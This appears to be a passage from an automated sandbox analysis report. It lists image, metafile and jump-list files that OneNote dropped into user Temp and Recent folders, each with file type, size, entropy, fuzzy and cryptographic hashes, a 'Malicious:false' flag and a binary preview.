                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F68B434C-4EF5-46D5-AD88-532153E319C2}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F6922BCF-CB96-4858-87D1-E870080163E7}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F713D160-F3F2-4786-B27F-DFEE6A14F046}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FD97F471-FEBC-47CD-8B01-AB55A092E88E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):95763
                                                                                                                                                                                                                  Entropy (8bit):7.931689087616878
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                                                                                                  MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                                                                                                  SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                                                                                                  SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                                                                                                  SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FDBC368B-25BA-43AC-A0D8-CF43A3A0E3A9}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49224
                                                                                                                                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                                                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                                                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                                                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FDD326B1-D384-49B7-AB22-DC02338CF50C}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FE40314B-2CDB-4F74-9B3E-ED93C34A1D96}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FE44BE42-CDBC-42BE-9F4B-393DEF1DCB1B}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):67991
                                                                                                                                                                                                                  Entropy (8bit):7.870481231782746
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                                                                                                  MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                                                                                                  SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                                                                                                                                  SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                                                                                                  SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FF987C6E-C4A6-45C3-8FA0-D0A9491E9012}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{FFFCC25B-9466-4BE3-9358-EAE763F4FA49}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32656
                                                                                                                                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3873
                                                                                                                                                                                                                  Entropy (8bit):3.487650078353351
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:fi8BAdO70fIFUbqzqgdCDDGTCDNdRBAdO70fh7+1qqGqzWk7dCDGWG5CDxgH:jNDqfGCzqALZha4
                                                                                                                                                                                                                  MD5:397D921281DE3473FE1D3C658339CDDF
                                                                                                                                                                                                                  SHA1:05163A968BF6745AE4ACC514726E0A60B8EECA7B
                                                                                                                                                                                                                  SHA-256:ABA122C4991945D58489CC94B28D3903E6BAA9516222CA1278B925E9F7B3D0BE
                                                                                                                                                                                                                  SHA-512:5AD38D7179049760E159F79BE81000495686AEA5D0A3DCB118A80F3DCE2E58F22FADC634F949E8DDFC3448A34A11AC60EDE777AB45F2977561180D8FBB1224EB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...................................FL..................F.@.. .....Q{....r.F.X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qVo.....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qVo......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qVo......].....................u..O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qVu...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BD1WL3R5TV3ZM06PG4MP.temp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3873
                                                                                                                                                                                                                  Entropy (8bit):3.487650078353351
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:fi8BAdO70fIFUbqzqgdCDDGTCDNdRBAdO70fh7+1qqGqzWk7dCDGWG5CDxgH:jNDqfGCzqALZha4
                                                                                                                                                                                                                  MD5:397D921281DE3473FE1D3C658339CDDF
                                                                                                                                                                                                                  SHA1:05163A968BF6745AE4ACC514726E0A60B8EECA7B
                                                                                                                                                                                                                  SHA-256:ABA122C4991945D58489CC94B28D3903E6BAA9516222CA1278B925E9F7B3D0BE
                                                                                                                                                                                                                  SHA-512:5AD38D7179049760E159F79BE81000495686AEA5D0A3DCB118A80F3DCE2E58F22FADC634F949E8DDFC3448A34A11AC60EDE777AB45F2977561180D8FBB1224EB
                                                                                                                                                                                                                  Malicious:false
